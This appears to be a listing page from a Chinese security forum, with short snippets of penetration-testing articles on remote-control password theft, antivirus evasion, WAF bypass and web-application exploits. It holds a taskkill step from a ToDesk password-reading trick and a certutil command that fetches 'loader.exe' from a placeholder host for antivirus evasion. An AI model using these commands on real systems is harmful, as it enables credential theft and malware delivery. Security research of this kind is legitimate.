远控软件密码读取新思路

随着 ToDesk 新版本的更新,通过替换配置文件读取本地密码的方法已经失效。本文将介绍一种基于截屏的方案,通过特定操作读取 ToDesk与teamserver 密码。 思路 这个方法的核心操作非常简单:杀掉 ToDesk 进程,触发其自启动,然后通过截屏来获取密码。具体步骤如下: 使用命令 taskkill 杀掉 ToDesk 进程: taskkill /f /t /im [pid] 截图

· 540浏览 · 2024-10-19 13:09
JAVA安全之命令执行研究分析

文章前言 命令执行漏洞是JAVA中一个老生常谈的话题,有时候我们在做代码审计时会发现明明是一个看似可控的命令执行的点,但是我们在构造载荷执行我们自己的命令时却发现使用的管道符拼接后却不能达到预期的目的,另外一个就是当我们输入的内容为整个要执行的命令内容时,在一些情况下并不会执行命令,另外就是对Linux平台和Windows平台的差异性的分析以及反弹shell的研究,本篇文字将基于此背景对JAVA原

· 888浏览 · 2024-10-16 10:29
分析某杀软规则库绕过certutil免杀实践

一、Certutil在某杀软环境下利用 certutil下载文件的常见命令: certutil -urlcache -split -f http://xxxxx/loader.exe 可想而知,在该杀软环境下是必定拦截的,下面我将分析其内存中存在规则进行绕过。 二、探究certutil免杀分析其规则库 首先打开火绒剑或者其他工具找到该杀软进程,搜索certutil.exe内存字符串。

· 624浏览 · 2024-10-16 07:12
SRC挖掘奇特思路案例

前言 一般漏洞挖掘都是思路千奇百怪,和渗透测试的方式完全不一样,因此再挖掘SRC的时候都是出奇守正来达到想要的想过,这里话不多说,简单讲解几个奇奇怪怪的思路。 案例一 描述 这个漏洞可以简单理解为403绕过,但是区别又有一点不一样,因为一般的403绕过都是../,..;/这样的路径或者使用XFF头,UA头等来达到绕过的目的,但是此方法是使用某雷下载工具进行绕过,因为某雷再使用过程中发现还没有它不能

· 2222浏览 · 2024-10-10 15:11
渗透基础-rcube_webmail版本探测

简介 本文介绍了开源产品RoundCube webmail邮件系统的版本探测思路,并用go语言实现工具化、自动化探测。 正文 0x01 探测思路研究 探测系统版本,最理想的方法就是系统主页html代码中有特定的字符串,比如特定版本对应的hash在主页的html代码中等等。 对于rcube mail,我们先查看它的主页html代码 稍作分析,发现上面html正文中,?s后面的字符串可能符合要求

· 640浏览 · 2024-09-30 05:04
内网渗透该怎么学-小白篇

前言:本文主要记录了作者之前在内网渗透的一个全方面的学习过程,包括如何从外网找到入口点,之后如何提权,然后如何在内网中进行一个信息收集,当存在域的情况下又是怎么收集信息,然后通过代理来进一步横向,不论是一层代理还是两层,本文都有涉及,以及一些常见的代理工具的使用方法、权限维持的手法、痕迹清理、内网渗透过程的整一个渗透思路是怎么样子的做一个简单的分享,同时希望能帮助到像我一样的小白能对内网渗透有进一

· 2721浏览 · 2024-09-27 02:34
记一次实战中对Ruoyi系统的渗透

记一次实战中对Ruoyi系统的渗透 前言 最近碰到比较多Ruoyi的站,ruoyi的话漏洞还是比较多的,这里就分享一下自己渗透的一些案例吧,方便大家参考学习 首先声明 文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何

· 1580浏览 · 2024-09-25 11:35
针对spring二次开发的BladeX站点的渗透测试

0x1 前言 浅谈 哈喽,师傅们好! 这篇文章呢,主要是我在微信公众号通过关注的一些大牛子师傅发的公众号,文章写的关于spring-blade后台框架系统的menu接口存在的1day漏洞,一些sql注入和未授权漏洞等,然后写了相关魔改后的blade的漏洞的打法,对blade比较感兴趣的我,也就开始踏上了blade漏洞挖掘的不归之路了! bladeX简介 BladeX 物联网平台是一款高度集成的

· 2623浏览 · 2024-09-19 05:21
Bypass403(小白食用)

Bypass403(小白食用) 前沿:403页面一直都是大家关注的一个方面,因为大家都知道403其实就是服务器明白你的请求,但是还是处于某种原因给你拒绝了,参数没错,可能是权限设置的问题等,但是只要突破限制,基本上都是能出漏洞的。 那403原理很简单:403页面是Web服务器返回的HTTP状态码之一,表示服务器已经理解客户端(通常是浏览器)的请求,但出于某种原因拒绝了该请求。当客户端尝试访问受限资

· 1960浏览 · 2024-09-16 16:30
Nacos配置文件攻防思路总结

前言 笔者最近在进行内网渗透时,遇到了存在超多Nacos资产的情况。而笔者在搜索Nacos相关利用资料时,发现大家的大部分注意力,似乎都是聚焦在Nacos本身的问题上,比如是否存在某个漏洞,能否RCE。 但是对于Nacos配置文件的一些衍生利用思路,却很少提及。根据笔者遇到的情况来看,对Nacos配置文件的分析利用(尤其是超多Nacos资产情况下),重要性其实是不亚于甚至超过RCE的。 鉴于此,笔

· 1390浏览 · 2024-09-15 10:27
Hikvision综合安防管理平台isecure center文件读取深度利用

前言 远离一线很久了,很难有实战的机会。碰到Hikvision的漏洞,市面上的很多文章又很模糊,自己摸全点做个详细记录。 参考文章,向佬学习。本次测试为内部授权测试,已脱敏。 https://mp.weixin.qq.com/s/zvo195UQvWwTppmCsnW9FA https://seveo.cn/archives/8 一、工具汇总(均为官网,其他工具请自行下载) 指纹识别工具: obs

· 4840浏览 · 2024-09-13 01:05
记一次实战中对fastjson waf的绕过

记一次实战中对fastjson waf的绕过 最近遇到一个fastjson的站,很明显是有fastjson漏洞的,因为@type这种字符,fastjson特征很明显的字符都被过滤了 于是开始了绕过之旅,顺便来学习一下如何waf 编码绕过 去网上搜索还是有绕过waf的文章,下面来分析一手,当时第一反应就是unicode编码去绕过 首先简单的测试一下 parseObject:221, DefaultJ

· 1574浏览 · 2024-09-12 11:56
通过信息收集进入门户网站的骚打法

0x1 前言 哈喽哇,师傅们! 又又到更新技术小文章的时间了,哈哈哈。 这篇文章呢,主要是讲如何通过信息收集进入门户网站的骚打法,然后文章里面写了很多的各种如何通过信息收集进行门户网站的姿势,写的很详细,因为渗透测试的最重要的一个环节就是信息收集,对目标资产的一个信息收集和资产的收集。 信息收集很重要,如确定资产,比如他有哪些域名、子域名、C 段、旁站、系统、微信小程序或者公众号,确定好站点或者

· 1867浏览 · 2024-09-08 12:39
微信API接口调用凭证+Access token泄露

0x1 前言 哈喽,师傅们! 最近在研究微信API接口相关漏洞问题,其中对于一个access_token泄露的相关研究发现,网上的这块资料很少,或者说对于这块的研究的文章好多都不全,于是有了写这篇文章的想法,也是主要给师傅们分享下,我对于这块的研究成果,然后希望师傅们有什么看法和意见欢迎在评论区留言。 0x2 微信API接口概述 一、获取接口调用凭据 功能描述 获取小程序全局唯一后台接口调用凭

· 3316浏览 · 2024-09-07 06:25
存在分包的微信小程序解包反编译还原(含报错处理与代码修复)

01前言 本文主要对微信小程序的解包步骤进行复现梳理,网上虽然已有明确详细的文章,但是实际复现过程中程序报错的情况并不少见。对此情况进行了梳理以及对相关工具的代码、调用方式等进行了优化修复。 本文内容: 常规微信小程序逆向解析的一般步骤 存在分包的微信小程序wxappUnpacker执行报错问题解决 微信小程序子包使用wxappUnpacker readme文件中命令解包报错问题解决 02环境

· 2065浏览 · 2024-09-04 09:51